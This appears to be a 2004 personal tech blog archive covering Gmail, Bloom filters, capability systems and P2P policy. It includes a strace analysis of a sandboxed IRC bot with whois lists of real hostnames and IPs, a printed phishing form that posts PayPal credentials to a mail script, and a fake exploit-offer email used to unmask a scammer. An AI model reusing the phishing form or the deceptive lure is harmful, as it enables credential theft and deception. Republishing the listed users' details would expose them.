    So setup a chroot jail here at Google. Put strace in it, su to a random UID and setup a firewall to stop that UID contacting the outside world.

    2808  open("/usr/dict/words", O_RDONLY) = -1 ENOENT (No such file or directory)
    2808  socket(PF_INET, SOCK_STREAM, IPPROTO_TCP) = 3
    2808  socket(PF_INET, SOCK_DGRAM, IPPROTO_IP) = 4
    2808  connect(4, {sa_family=AF_INET, sin_port=htons(53), sin_addr=inet_addr("0.0.0.0")}, 28) = 0
    2808  send(4, "\217Z\1\0\0\1\0\0\0\0\0\0\3irc\5efnet\2nl\4corp\6g"..., 46, 0) = -1 EPERM (Operation not permitted)
    2808  close(4)                          = 0
    2808  socket(PF_INET, SOCK_DGRAM, IPPROTO_IP) = 4
    2808  connect(4, {sa_family=AF_INET, sin_port=htons(53), sin_addr=inet_addr("0.0.0.0")}, 28) = 0
    2808  send(4, "\217Z\1\0\0\1\0\0\0\0\0\0\3irc\5efnet\2nl\4corp\6g"..., 46, 0) = -1 EPERM (Operation not permitted)
    2808  close(4)                          = 0
    2808  socket(PF_INET, SOCK_DGRAM, IPPROTO_IP) = 4
    2808  connect(4, {sa_family=AF_INET, sin_port=htons(53), sin_addr=inet_addr("0.0.0.0")}, 28) = 0
    2808  send(4, "\217Z\1\0\0\1\0\0\0\0\0\0\3irc\5efnet\2nl\4corp\6g"..., 46, 0) = -1 EPERM (Operation not permitted)
    2808  close(4)                          = 0
    2808  socket(PF_INET, SOCK_DGRAM, IPPROTO_IP) = 4
    2808  connect(4, {sa_family=AF_INET, sin_port=htons(53), sin_addr=inet_addr("0.0.0.0")}, 28) = 0
    2808  send(4, "\217[\1\0\0\1\0\0\0\0\0\0\3irc\5efnet\2nl\0\0\1\0\1", 30, 0) = -1 EPERM (Operation not permitted)
    2808  close(4)                          = 0
    2808  socket(PF_INET, SOCK_DGRAM, IPPROTO_IP) = 4
    2808  connect(4, {sa_family=AF_INET, sin_port=htons(53), sin_addr=inet_addr("0.0.0.0")}, 28) = 0
    2808  send(4, "\217[\1\0\0\1\0\0\0\0\0\0\3irc\5efnet\2nl\0\0\1\0\1", 30, 0) = -1 EPERM (Operation not permitted)
    2808  close(4)                          = 0
    2808  socket(PF_INET, SOCK_DGRAM, IPPROTO_IP) = 4
    2808  connect(4, {sa_family=AF_INET, sin_port=htons(53), sin_addr=inet_addr("0.0.0.0")}, 28) = 0
    2808  send(4, "\217[\1\0\0\1\0\0\0\0\0\0\3irc\5efnet\2nl\0\0\1\0\1", 30, 0) = -1 EPERM (Operation not permitted)
    2808  close(4)                          = 0
    ...

    That's edited a lot. It just started flooding DNS requests. So, I let it contact a DNS server and connect to irc.efnet.nl.

    2837  connect(3, {sa_family=AF_INET, sin_port=htons(6667), sin_addr=inet_addr("193.109.122.77")}, 16) = 0
    2837  setsockopt(3, SOL_SOCKET, SO_LINGER, NULL, 0) = -1 EINVAL (Invalid argument)
    2837  setsockopt(3, SOL_SOCKET, SO_REUSEADDR, NULL, 0) = -1 EINVAL (Invalid argument)
    2837  setsockopt(3, SOL_SOCKET, SO_KEEPALIVE, NULL, 0) = -1 EINVAL (Invalid argument)
    2837  write(3, "NICK MXQC\nUSER HNMKFQ localhost localhost :LTQQEFD\n", 51) = 51
    2837  select(4, [3], NULL, NULL, {1200, 0}) = 1 (in [3], left {1200, 0})
    2837  recv(3, "NOTICE AUTH :*** Looking up your hostname...\r\nNOTICE AUTH :*** Checking Ident\r\nNOTICE AUTH :*** Found your hos
    tname\r\n", 4096, 0) = 117
    2837  select(4, [3], NULL, NULL, {1200, 0}) = 1 (in [3], left {1190, 600000})
    2837  recv(3, "NOTICE AUTH :*** No Ident response\r\n", 4096, 0) = 36
    2837  select(4, [3], NULL, NULL, {1200, 0}) = 1 (in [3], left {1199, 830000})
    2837  recv(3, "PING :936DFE7C\r\n", 4096, 0) = 16
    2837  write(3, "PONG :936DFE7C\n", 15)  = 15
    2837  select(4, [3], NULL, NULL, {1200, 0}) = 1 (in [3], left {1199, 820000})
    2837  recv(3, ":irc.efnet.nl 001 MXQC :Welcome to the EFnet Internet Relay Chat Network MXQC\r\n", 4096, 0) = 79
    2837  write(3, "MODE MXQC -xi\n", 14)   = 14
    2837  write(3, "JOIN #krowy :krowa\n", 19) = 19
    ...

    So it joins a private IRC channel. I can do that. A @google.com address got me banned pretty quickly. But not before I got a whois on everyone there:

    --- [FDMYSGLM] (GIWcF7CNSH@badboy.icyhost.com) : UUTIDJJH
    --- [FDMYSGLM] @#krowy 
    --- [FDMYSGLM] irc.efnet.nl :Business Internet Trends IPv4/IPv6 EFNet server
    --- FDMYSGLM 66.98.130.9 :actually using host
    --- [FDMYSGLM] idle 49:13:19, signon: Tue Aug 10 15:54:49
    --- [FDMYSGLM] End of WHOIS list.
    --- [forger] (konrad@aay116.neoplus.adsl.tpnet.pl) : I'm too lame to read mirc.hlp
    --- [forger] #hihaho #test45 @#krowy 
    --- [forger] irc.efnet.pl :Discover a lost art - www.marillion.com
    --- [forger] End of WHOIS list.
    --- [its`me] (~ludziu@nat-0.infoland.int.pl) : ^=^
    --- [its`me] @#krowy 
    --- [its`me] irc.efnet.pl :Discover a lost art - www.marillion.com
    --- [its`me] End of WHOIS list.
    --- [MQJJEBR] (~WTKC@pc-212-51-219-2.p.lodz.pl) : DILLEUN
    --- [MQJJEBR] @#krowy 
    --- [MQJJEBR] irc.efnet.nl :Business Internet Trends IPv4/IPv6 EFNet server
    --- MQJJEBR 212.51.219.2 :actually using host
    --- [MQJJEBR] idle 49:13:27, signon: Tue Aug 10 16:01:19
    --- [MQJJEBR] End of WHOIS list.
    --- [ori00n] (h4x0r@dial-770.wroclaw.dialog.net.pl) : l33t
    --- [ori00n] #test45 #cc @#krowy 
    --- [ori00n] irc.efnet.pl :Discover a lost art - www.marillion.com
    --- [ori00n] End of WHOIS list.
    --- [YDMOCCRO] (~KQFU@banks.su.nottingham.ac.uk) : JHASTZIH
    --- [YDMOCCRO] @#krowy 
    --- [YDMOCCRO] irc.efnet.nl :Business Internet Trends IPv4/IPv6 EFNet server
    --- YDMOCCRO 128.243.90.87 :actually using host
    --- [YDMOCCRO] idle 49:13:32, signon: Tue Aug 10 16:48:28
    --- [YDMOCCRO] End of WHOIS list.
    --- [agl] (~agl@216-239-45-4.google.com) : agl
    --- [agl] #krowy 
    --- [agl] irc.efnet.nl :Business Internet Trends IPv4/IPv6 EFNet server
    --- agl 216.239.45.4 :actually using host
    --- [agl] idle 00:00:49, signon: Fri Aug 13 14:07:34
    --- [agl] End of WHOIS list.
    --- [MITPIXPN] (~BJSAQXGU@211.239.197.130) : MIHSH
    --- [MITPIXPN] #krowy 
    --- [MITPIXPN] irc.efnet.nl :Business Internet Trends IPv4/IPv6 EFNet server
    --- MITPIXPN 211.239.197.130 :actually using host
    --- [MITPIXPN] idle 00:18:13, signon: Fri Aug 13 13:50:23
    --- [MITPIXPN] End of WHOIS list.
    --- [NKKXLTC] (www-data@rei.animehq.hu) : WSOV
    --- [NKKXLTC] #krowy 
    --- [NKKXLTC] irc.efnet.nl :Business Internet Trends IPv4/IPv6 EFNet server
    --- NKKXLTC 195.70.50.20 :actually using host
    --- [NKKXLTC] idle 00:19:31, signon: Fri Aug 13 13:49:00
    --- [NKKXLTC] End of WHOIS list.
    --- [PHQW] (~FNWDDYH@dsl-213-023-046-090.arcor-ip.net) : SYEV
    --- [PHQW] #krowy 
    --- [PHQW] irc.efnet.nl :Business Internet Trends IPv4/IPv6 EFNet server
    --- PHQW 213.23.46.90 :actually using host
    --- [PHQW] idle 00:11:23, signon: Fri Aug 13 13:57:17
    --- [PHQW] End of WHOIS list.
    --- [VQMVYOHE] (~WEEBA@211.239.197.130) : HBQFDHTF
    --- [VQMVYOHE] #krowy 
    --- [VQMVYOHE] irc.efnet.nl :Business Internet Trends IPv4/IPv6 EFNet server
    --- VQMVYOHE 211.239.197.130 :actually using host
    --- [VQMVYOHE] idle 00:18:09, signon: Fri Aug 13 13:50:34
    --- [VQMVYOHE] End of WHOIS list.

    Looks like forger is running the game as he quickly kicks the jailed moo bot that I'm running (also from @google.com). He then changes his nick to shitniz, like it will help.

    But thankfully moo seems to do exactly what it says on the tin; so probably not a problem. Oh, and that channel is now invite only. I guess he got scared. shitniz is still there thou.

    Patch to add SPF to Gento...

    Patch to add SPF to Gentoo qmail.

    Based on http://www.saout.de/misc/spf/

    Gmail backending

    Did you know that .org pushes now happen about every 5 minutes? I was certainly pretty surprised last night. Now if only they didn't have silly registration and server number restrictions at the gTLD level the DNS system might not be a complete pile of doggy poo.

    And the reason why I was playing with DNS is that IV now has a new mail server. Say hello to zool.imperialviolet.org every one, the third server to have an .imperialviolet.org name (I wonder if anyone here remembers tzu and metis?). Hopefully this should fix the mail bouncing problems that dodo was having. And, if anyone wants hosting for mail servers etc now is the time to ask.

    The switch of servers has broken automatic email bots (that's comments and keyverify), but I'm running them manually at the moment so you can still use them all the same. And boy do people use keyverify a lot. I wasn't expecting any traffic but I've had to deal with about 10 messages today from that.

    I was being a little silly yesterday. If one was going to implement a new backend for the gmail javascript, there's an obvious choice ... gmail. Gmail does a perfect job of storing and sorting mail, just forward the queries onto them!

    Before you wonder what the hell the point of re-backing gmail only to forward them to the real gmail is, remember the motivation. I want email messages to be sent from the right place, with the right From address so all I have to do is intercept the "send email" POST and a) send the email from zool b) send it onto gmail with a blackhole email address.

    That's it. Now, if you don't like the idea of gmail storing your email then you really do have to do the whole thing. But I know that gmail stores lots of copies of my mail and that they aren't profiling it. For the moment I'm happy with Google managing my email and this simple solution is great (I think that would go for many people).

    But after a while, someon...

    But after a while, someone needs to make a change, and inevitably, they break your code. Do you suppose they'll notice? Not likely. But you will, when google.com starts serving elephant porn on 11 million searches. Stop elephant porn before it starts by writing unit tests for all your code.

    Why hasn't anyone back-en...

    Why hasn't anyone back-ended gmail? Seriously, it's a client side app, that means you can take the javascript and reimpliment the server. It's not that hard! Lots of people seem to be doing different clients for gmail (injectors, notifiers etc) - but I want a different backend!

    I don't want my address to be @gmail (and Reply-To isn't good enough). At the moment the server which handles imperialviolet.org email is upset so I don't even have my Reply-To set. But I'm switching to a different server soon and I want a gmail server to install!

    Seriously, it's easy, I copied implimented a NULL backend for gmail in about 30 minutes. The list of email is static and nothing actually works but all the data looks like:

    D(["t",["fe4e30d37ca51d9",0,0,"7:11am","\<span id=\'_user_rmages@linux-azur.org\'\>Rene Mages\</span\>","&nbsp;","Software Patents : Postcard Action",
    "Hi all, Probably, the EU Software patent Directive should return to the European Parlement during &hellip;",[]
      ,"","fe4e30d37ca51d9",0]

    It's not that tough. Python provides mailbox parsing, IMAP clients etc (if you want).

    Unfortuantely, I don't have the time.

    Storage for archive.org...

    Storage for archive.org

    A quick commentary on the...

    A quick commentary on the letter sent by many attorneys general the `peer-to-peer software' producers.

    At present, P2P software has too many times been hijacked by those who use it for illegal purposes to which the vast majority of our consumers do not wish to be exposed.

    I hate to point out that the reason that most people use P2P networks is to be exposed to these `illegal purposes'. Look at the usage numbers for Napster before and after it went `legal'.

    P2P file-sharing technology works by allowing consumers to download free software that enables them to directly share files stored on their hard drive with other users. This type of direct access to one's computer differentiates P2P file-sharing technology from garden-variety e-mail accounts and commercial search engines such as Google and Yahoo.

    As opposed to the bleeding obvious differences between P2P and email/search engines?

    One substantial and ever-growing use of P2P software is as a method of disseminating pornography, including child pornography.

    Yep. True at least.

    Consequently, P2P users need to be made aware that they are exposing themselves, and their children, to widespread availability of pornographic material when they download and install P2P file-sharing programs on their computers.

    While sensible I'm guess that most people realise this. Esp after their first IE session where after they are let with dozens of popup windows of porn.

    Furthermore, P2P file-sharing technology can allow its users to access the files of other users, even when the computer is "off".

    Seriously, no. It really can't.

    P2P users, including both home users and small businesses, who do not properly understand this software have inadvertently given other P2P users access to tax returns, medical files, financial records, personal e- mail, and confidential documents stored on their computers. ... Consequently, P2P users need to be properly educated so that they will not inadvertently share personal files on their hard drives with other users of your P2P file-sharing technology.

    And this is small fry when compared to the amount of information leaked by viruses, photocopiers and leaving one's breifcase on the roof of the car as you drive away. (And, in the case of the British secret service, leaving your laptop in the pub). Since when do attorneys general bother themselves with people being stupid?

    The illegal uses of P2P technology are having an adverse impact on our States consumers, economies, and general welfare.

    Of course, this statement is asserted without justification and is debatable at best.

    P2P file-sharing programs also are being used to illegally trade copyrighted music, movies, software, and video games, contributing to economic losses. The Business Software Alliance estimates that its members lost $13 billion in revenue last year due to software piracy. According to a February 20, 2004 CNN article, U.S. software companies lose up to $12 billion a year in piracy according to the Software and Information Industry Association. Music companies lost more than $4.6 billion worldwide last year, according to the RIAA [Recording Industry Association of America] and movie industry officials pegged their annual losses from bootlegged films at more than $3.5 billion.

    at least here they give their sources, and what independant sources they are too. Generally `losses', as calculated in these figures are an estimate of the number of copied works (rounded up) times the retail cost. Which is assuming that every download is a lost sale.

    We would ask you to take concrete and meaningful steps to avoid the infringement of the privacy and security of our citizens by bundling unwanted spyware and adware with your software.

    I don't think they actually meant what they wrote here, but it's at least a little ray of light if I'm reading it (in)correctly.

    Encryption only reinforces the perception that P2P technology is being used primarily for illegal ends. Accordingly, we would ask you to refrain from making design changes to your software that prevent law enforcement in our States from investigating and enforcing the law.

    I think that law-enforcement already has plenty of powers to deal with this - upto and including installing keyloggers on suspect's computers.

    We believe that meaningful steps can and should be taken by the industry to develop more adequate filters capable of better protecting P2P parents and children from unwanted or offensive material. Not warning parents about the presence of, and then reasonably providing them with the ability to block or remove, obscene and illegal materials from their computers is a serious threat to the health and safety of children and families in our States.

    What the hell are `P2P parents'? Most of the parents I know are of the regular kind, and that kind are perfectly capable of supervising their children.

    Lots of Python magicHolog...

    Subway

    It seems that Subways are breeding like Starbucks these days. And I kind of understand why, they are certainly a step up (quality wise) from McDonalds and those of that ilk. But, in the UK, I avoid them because buying anything is too stressful.

    Subway take the idea of choice very seriously - you can choose your bread, your type of cheese, your toppings, almost anything. But cost pressure means that they are usually staffed by foreign workers; and foreign workers are great, esp female ones. But they often don't have the soundest grasp of English.

    A Subway visit usually consists of a whole barrage of questions in semi-English with a queue of people behind you. Since I have no idea what they're saying I usually resort to answering "Please", "No thanks", "Not today thanks", ... randomly. And often they don't understand my reply so I end up getting something that I didn't ask for and didn't know what it was in the first place. It's astounding that, with all this confusion, I don't end up with a 9 foot sub packed full of strawberry jam, condensed milk and ready salted crisps.

    But I've now discovered the driving force behind Subway - Californian workers. It's almost sickening how pleasant Californian shop assistants are. Buying a carton of milk involves, at least, "Hi! How are you? What a great day! Let me ring those up for you. So that's three bucks ... that's great. There you go, there's you milk. Have a wonderful weekend! No really, have a really great weekend - hope to see you again. Bye now!".

    I fear that if I ever find a shop assistant in this place who tells me to fuck off I'll end up dancing in the street with glee.

    But it seems that working at Subway is boring enough to take some of the edge of whatever drugs the people round here are on - but leave someone who can speak English. And since I now know what the hell I'm asking for I actually get a decent meal.

    Which is good, because all the shops round here seem to sell by the metric tonne. Thank god Google feeds me the rest of the time.

    Ohh, PyBloom made the del...

    Ohh, PyBloom made the del.icio.us popular list. Ahh, the feeling of little fame .

    Bloom filters

    In reply to The Register: Archive.org suffers Fahrenheit 911 memory loss:

    > But just hours after putting up the movie, Archive.org pulled it down
    
    Although Moore is the creator of the film, that doesn't mean that he holds the
    copyright. The copyright law is very broken. Archive.org knows this and is
    doing it's best to fix it[1]. However, organisations are still bound by the
    rule of law
    
    [1] http://www.archive.org/about/dmca.php
    
    > "Then, it called Archive.org to remove any trace of the interview at all".
    
    Given that there's a six month delay till content hits the Wayback Machine, I
    very much doubt that.
    
    > "and how a "library" can obey this request defies comprehension"
    
    Welcome, once again, to the law. I'm sorry that archive.org doesn't do the
    Right Thing - irrespective of the law. We would all like several aspects of the
    law to be changed, but the way to do that is quite well known. Small
    organisations which break the law don't change it - they cease to exist.
    
    You know, if you want to host all the copyrighted content in the US, for free
    and take on the RIAA + MPAA etc. Go ahead and fund it. I'm guessing that you're
    not willing to take that personal risk. You'll just keep attacking others for
    not doing it for you.
    
    Archive.org isn't perfect - it's struggling to archive all the content that it
    legally can without the funds or the lawers to do so. But it's trying.
    
    Next time it's a slow news day - take a walk.
    
    AGL

    There doesn't (for some strange reason) seem to be any good Python source for Bloom filters. There's a Sourceforge project, but that uses mpz for hashing, which is deprecated. So I've written PyBloom which impliments counting and standard bloom filters.

    Well, the kernel patch I ...

    Well, the kernel patch I need to impliment capability systems has been written by Andrea Arcangeli.

    Stackless twisted Python ...

    Stackless twisted Python proof-of-concept code that I wrote today.

    Toilets at Google

    MD5 cracking in seconds

    The toilets at Google have no less than 22 buttons (yep, I did count them). As wiping ones own butt is oviously far too great a burden these days these toilets have a little `wand' that can come out and spray water up your arse (or at the front for the girls ... or the boys I suppose) - that's 5 buttons.

    The seat and spray water are also heated (4 buttons) and the wand can be moved back and forth (2 more). It can self-clean (many buttons) and do stuff on a timer. It even has a button to flush!

    Frankly - I can't write about most of the stuff that goes on here so that's why I'm talking about the toilets. But I'm doing great :)

    Got here - not dead

    Well - in flight entertainment keeps getting better every time I fly. Today I had full video on demand with a good selection of films and that makes the flight so much nicer. Now, you may be one of those people who can sleep on planes - but I'm not. I need something .. anything .. do to and Virgin Atlantic now has my custom until I hear that someone else does it better.

    Unfortunately, the good flight was balanced by a god-awful customs lines. It wasn't that they gave me a hard time (I did have to give two fingerprints thou) but it was training day. And thus everything went very slowly. Very, very slowly.

    Yay! Unsecured wireless a...

    Yay! Unsecured wireless access point at home! Unfortunately, I have to balence my laptop on a box, on the window ledge for it to work. But it's a good 60KB/s link.

    So, thanks to that and the (not as good as emerge, but still ok) apt-get my old laptop now has X 4.3.0 with subpixel rendering and Firefox 0.9.

    Also, it seems that people don't like the Speex codec - I guess technical quality isn't everything so I'll upload the raw WAVs for the NotCon talk tonight. (Assuming someone doesn't turn this AP off).

    For anyone who has ever w...

    For anyone who has ever wondered what the picture and quote at the top of the front page was all about, then see today's featured article on Wikipedia.

    I have far too little tim...

    I have far too little time to do this properly, but I'm managed to do a little of the NotCon cutting. There were a lot of cool people there - some of them were even speaking, but Brewster Kahle's Talk blew me away. I really think that everyone should listen to this.

    (Speex codec homepage← codex that I used)

    I'm tidying up, ready to ...

    I'm tidying up, ready to move home. Just next to my desk I've a piece of paper upon which I scribble down words that I don't know and later I lookup the definitions. Since any scrap of paper will get lost in the move I've typed it up:

    chutzpah utter nerve
    trite lacks power because of overuse
    churl a bad tempered person
    entheogenesis creating the divine within
    paragon excellence, a peerless example
    experiential from experience
    exonym a name given by secondary persons
    Mesopotamia between the rivers (Greek)
    panspermia interplanetary seeding
    monograph definitive work on the subject
    miscegenation breeding between whites and non-whites

    Firstly, you can stop ema...

    Firstly, you can stop emailing me about gmail invites now. I've gone through six nine of them and I've run out. However, pretty much all of Dramsoc has an account now.

    Gary is still copying the recording of NotCon onto a hard drive - so that's not done either.

    I've just been busy with nothing in particular and nothing particularally interesting. I've just posted a Python module for finding the maximal flow in networks if anyone is interrested.

    And would people please get "that", "which" and "who" the right way round? Correct examples:

    • The cats that are blue have hair. (exclusive clauses use "that")
    • The cats, which are blue, have hair. (non-exclusive clauses use "which". Note that the last sentence means "cats that are blue"→"have hair" but this one means cats→have hair & cats→are blue.)
    • The people who are blue have hair. (Talking about people means you use "who")

    That is all.

    Ok, so I should write mor...

    Ok, so I should write more about NotCon and things ... but I'm not going to at the moment.

    But I do have a gmail invite. Who wants it? (email me).

    Questioning the parties about Software Patents

    Since the European elections are coming up on June 10th I decided to ring round and ask some of the parties about their policy on software patents.

    • Greens: Firmly against as a general policy (the person I spoke to didn't know any details). Sent me an email with these links. "the Green Party is against the idea of extending patents to software"
    • Lib Dems: First person I rung had no idea what I was talking about. Gave me a foreign number with a very knowledgeable person on the end. Basically they want a clearer law (were unhappy that the current law was being too widely interpreted) and wish to `strike a balance'. Were clear that the US system was flawed and that the patent office was overworked. But still believed that small business needed to be able to hold patents on inventions (inc software).
    • Conservatives: Bounced twice till someone could answer the question and even then they just read out a prepared statement. There was little point in questioning as the poor guy didn't have a clue what he was talking about. The statement basically said that they were unhappy with the current state of play because they wanted more patents, though they recognise the the US system is out of balance etc.

    Hmm...

    If Bruce Sterling actually wrote the comment in this then he should be ashamed. Only when preaching to the most devout choir can only get away with such crap.

    "Here's what we do know about NV45, it's currently running at a 450MHz core clock with 1.1GHz GDDR3 memory"

    ... graphics cards are now running faster than (one of) my CPUs.

    I need to stop reading the news...

    Because it just raises my blood pressure too much.

    I need a simple search bot that can pickout stories complaining of "bypassing" "revenue", like they have a right to a profit and shouldn't have to work for it, and replace it with <h1>MORONS</h1>

    Well, I said that I'd wri...

    Well, I said that I'd write to the returning officer about the stupid London Mayor elections, and here it is. Finial comments in before tomorrow morning please (because that's when I post it).

    Ok, so I've only just rea...

    Ok, so I've only just realised where the name Samizdata comes from. I feel silly.

    I also intend to write to the returning officer for the London Mayor elections to ask where the hell their election system comes from:

    If one candidate gets more than half of the first choice votes, he or she is the winner.

    If no candidate gets most than half of the first choice votes, all candidates except the two with the most are ruled out of the counts. The ballot papers of those voters whose first choice vote was for an eliminated candidate are then examined. Any second choice notes from these ballot papers for the two remaining candidates are added to their scores. Whoever of the two remaining candidates then has the most first and second choice votes is the winner.

    (typos are mine)

    Does anyone know if this has a name? I'm pretty certain that is doesn't have many of the desirable properties of other systems.

    Capability Systems page g...

    Capability Systems page got an FAQ added to the end of it to answer some of the questions that people have emailed me.

    And never, ever deal with SET Lighting and Sound. (Yes, that's an attempt at a google bomb)

    Capability Systems

    400th entry!

    You have probably noticed that the Janie Box has been replaced with a link-roll powered by del.icio.us. It's only updated when I regenerate the site, which is a manual process and not on a cron job at the moment. But if you're bored the site is generally a good source of cool links.

    Also, I've ticked off one of my todo items: writing the text on capability systems:

    When you go to the liquor store, do you hand the cashier your wallet, and ask him to take out what it costs?

    Nope? Then why can your mp3 player read ~/.gnupg/secring.gpg?.

    We have ridiculous amounts of ambient authority floating around our programs. A capability system not only allows us to move towards a design conforming to the principal of least authority, but creates a cleaner design at the same time.

    (Read the rest: Practical UNIX Capability Systems)

    Things to do after exams

    • Build stackless
    • Write text on cap systems
    • Write text on why javascript isn't evil
    • Get gcal working
    • XML rant

    (this is more of a personal todo than anything else. Nothing to see here, move along)

    Dogs can't vote!Not direc...

    Dogs can't vote!
    Not directly

    If you're American this is your task for today. Oi! Come back. I will hunt you down with my IP address guided custard pie if you don't.

    • Read this bill. If you don't agree with it, you're probably probably using this blog as an example of Communist propaganda - so I guess I've lost you. If this is the case then you can go now.
    • Lookup your representative
    • Lookup their contact details. Note them down - it's always useful
    • This is a list of people on the subcommittee that has to vote this bill up on the 12th. If your rep is on the subcommittee then phone or write (with paper) to them. If you're writing then lay it out properly with your address and signature and everything. Keep it short and don't rant.
    • If you phone them, you have to speak with the staff member who is dealing with this bill (or the general IP law staffer).
    • You can both phone and write, of course.
    • You can contact you rep even if they aren't on the subcommittee. You can also contact reps who are, even if they aren't your rep.
    • Form letters are bad - try to write it yourself.

    When you have done this, email me or post a comment and I'll order the homing custard pie to self destruct.

    The future of music canno...

    The future of music cannot include record labels as we have them today.

    If you need weird passport photos done (e.g. special sized US NI visa photos) - go to Passport Photo Services on Oxford St. No hassle, very quick and such weird requests handled without issue.

    And did you know that Virgin on Tottenham Court Rd has a real music hardware section on the bottom floor? I'm pretty sure that it's fairly new, but they sell proper desks (Midas and Yamaha) and mics etc. It's all really expensive - but could be useful to have a look at before buying it from somewhere sensible.

    The Quest for Omega - hig...

    The Quest for Omega - highly recommended

    Tracking down a PayPal scammer

    I was bored last night (you know, revision, makes you do strange things...). So I actually opened one of those scam PayPal emails:

    It has come to our attention that your PayPal account information needs to be updated as part of our continuing commitment to protect your account and to reduce the instance of fraud on our website. If you could please take 5-10 minutes out of your online experience and update your personal records you will not run into any future problems with the online service.

    The link text is at www.paypal.com, but the destination is http://210.120.9.236/paypal/login.htm. That's a solaris box running every service under the sun. I've no doubt that it's a hacked box, so I've emailed the netblock owner (no answer). I also emailed the netblock owner for the host where the email came from - pretty prompt answer from them (they are looking into it). But let's have a look at the HTML from the scam page (which looks identical to a real PayPal page):

    <FORM action=http://www.i-st.net/cgi-bin/web2mail.cgi method=post><INPUT type=hidden value=mirub@linuxmail.org name=.email_target> <INPUT type=hidden value=username-password name=.mail_subject> <INPUT type=hidden value=http://210.120.9.236/paypal/loginloading.htm name=.thanks_url>

    Basically, it's emailing him via linuxmail.org (I've emailed linuxmail and told them this). But that's about as far as I can go. I can't find out who is reading that email account. Or can I?

    Subject: New remote root exploit for OpenSSH 3.7.x
    To: mirub@linuxmail.org
    From: xyz@abc.com
    
    I hear that you're an elite hacker. I'd like to share exploits with you, so as
    a gesture of good faith (to get the ball rolling) this exploit is doing the
    blackhat rounds but hasn't hit the mainstream yet. Many juicy boxes are running
    vulnerable sshds:
    
    http://www.doc.ic.ac.uk/~guest01/openssh-xploit.c
    
    Hope to hear from you...

    And the contents of http://www.doc.ic.ac.uk/~guest01/openssh-xploit.c:

    Well, that'll be your IP in the weblogs.
    
    Cheers.

    And indeed:

    62.162.228.219 - - [02/May/2004:11:54:26 +0100] "GET
    /~guest01/openssh-xploit.c HTTP/1.1" 200 51
    "http://adsfree.linuxmail.org/scripts/mail/mesg.mail?folder=INBOX&order=Newest&
    mview=a&mstart=1&.popup=0&msg_uid=1083452662&mprev=1083452665&mnext=1083452657"
    "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322)"
    inetnum:      62.162.224.0 - 62.162.255.255
    netname:      MTnet-ADSL_subnet
    descr:        ADSL subnet
    descr:        Skopje, Macedonia
    country:      MK

    Very little chance of getting him in Macedonia. Oh well, at the very least he probably wet himself :)

    As everyone on the planet...

    As everyone on the planet knows by now (it was even front page news on the Evening Standard), Google is floating. This means that I'm probably going to be working there when they float - which should be an interesting experience. I'll come in one day and the net worth of a decent number of people there will have jumped overnight.

    I really hope that this doesn't mess the company up too much. They aren't perfect, but (as I hope to find out) everyone there says that it's a pretty special place. However, it has the coolest S1 filing ever. Brin and Page are staying and make it very clear that they are going to run the company their way. Also:

    the exact value of its planned offering is $2,718,281,828 dollars, which some would immediately recognize as the mathematical constant e.

    Nice.

    Your daily dose of What t...

    Your daily dose of What the Fuck?

    Gmail

    Experiment possibly discounts Many Worlds and Copenhagen interpretations.

    Frankly, wow. Gmail is very cool. In fact I possibly prefer it to mutt, my usual mailreader - but give me a couple of days before I pronounce on that.

    Gmail is the first web application that actually deserves the name. For example, the inbox page has 2 lines of HTML, all the rest looks like:

    D(["v","108424e99f735b5"]
    );
    D(["i",0]
    );
    D(["qu","0 MB","1000 MB","0%","#006633"]
    );
    D(["ds",2,0,0,0,0,0]
    );

    Basically, there's a master Javascript page which parses all that and spits out HTML, client side. That also means that the interface is very fast for the most part. A round-trip to the gmail server takes a while as ever (<1 second) but many operations are just javascript. And the vi key bindings 'j', 'k' and '/' work

    New Signing Key

    All my outgoing mail should be signed by my non-secure key. (Unless I know you use Windows or some other crap client that can't cope with RFCs). My old non-secure key just expired, so here is the new one (signed by my master key):

    (Also availible on all good keyservers soon)

    pub  1024D/5FD38350 2004-04-23 Adam Langley (Non secure signing key) 
    sub  1024g/A51F1F5E 2004-04-23 [expires: 2005-04-23]
    -----BEGIN PGP PUBLIC KEY BLOCK-----
    Version: GnuPG v1.2.4 (GNU/Linux)
    
    mQGiBECJMIERBACwCG/dJXNvQmBYCc64/HAIhDLXI75tUe+mxqvlIRCPPVqTFWd7
    jolhGg1BrHI+v1QH+7ERpcr3vBgpvWkhRho1FBEvhyLR6Mdfvb4T06jj77SLikRy
    XvaZfPPnfHhNXdjxEbLe57hPH7dSIrXP21AIZizH9OnBwfvyVA7E5mITiwCgxzxF
    fndrbEAsU2cnjd3cd4T0o7kD/2kq4UX33yKWLl+WiU+Q3eXAorWms0JwDAzCskG4
    wB3fvj7jVSHkuRAd4zHFPqxE155rr30MsY572mFO27EYFI4ZioubVVVZv3pN5V+3
    Hy2np+xPXBtwNir0GB/6ifnPsmW6uxe9X2T64D89cNfuisoEJ+zWBy2xzwyzEV1S
    EQZTA/40iwLN9MgHm8NIMRNQgQJvGoJZ2BKgSsFWtTL6lbeWNAvOKRlD4jpS0B6D
    xBdTDjqrlaQIm8OYZ13LRY24tY035xAHv56zHqBGP7Tg8T3SyRPrvpwa4zKI8giV
    8k/75Va2yMliQIsv2xfxbIYkscDX6QRGzrF1gNUbdiJGLTJBY7Q+QWRhbSBMYW5n
    bGV5IChOb24gc2VjdXJlIHNpZ25pbmcga2V5KSA8YWdsQGltcGVyaWFsdmlvbGV0
    Lm9yZz6IZAQTEQIAJAUCQIkwgQIbAwUJAeEzgAYLCQgHAwIDFQIDAxYCAQIeAQIX
    gAAKCRBYHZWLX9ODUC0CAJ9lUzvCra8GdYxGhsyzai2vVUctYQCfXLFo4qZHrXhQ
    jxUrBrBLZ7xbY3yITAQTEQIADAUCQIkw0QWDAeEzMAAKCRDNpVLfLLY9YB4aAJsF
    V8zYo+gUsWc+awch1TKr0rORkwCeNGyX+HDQ6RBBy64XJQtFnVaYwLy5AQ0EQIkw
    hRAEAM7C1brA5o31SGVLxd2wtPLdHyhyt7Il1HmCXNP6uUaXKN0Z8xbCj0mOTtsz
    HjzBNo7UPInsAkaJOz/bo+iXcCX5X/hgKNljsuhHOP5mVtedvEBCfCFCHAKyHuQy
    YJzkQIkgvPWH+YIqn7LNSVjJ0/ZK9jGa2sB1OwLEwV64nWFnAAMFA/sHM9+UvhIY
    L/LU3rOwRIMXhJolm4RHsem/Xty9ZTQT29CoPqeJdVUkhoVxOc1s3DIUUVegFNxV
    UIEPfs8cqin4HtEBaxl+howHD7AOzH03HRvtBzu0mZ+LC2YuIZxGRJaN0vKMx9m0
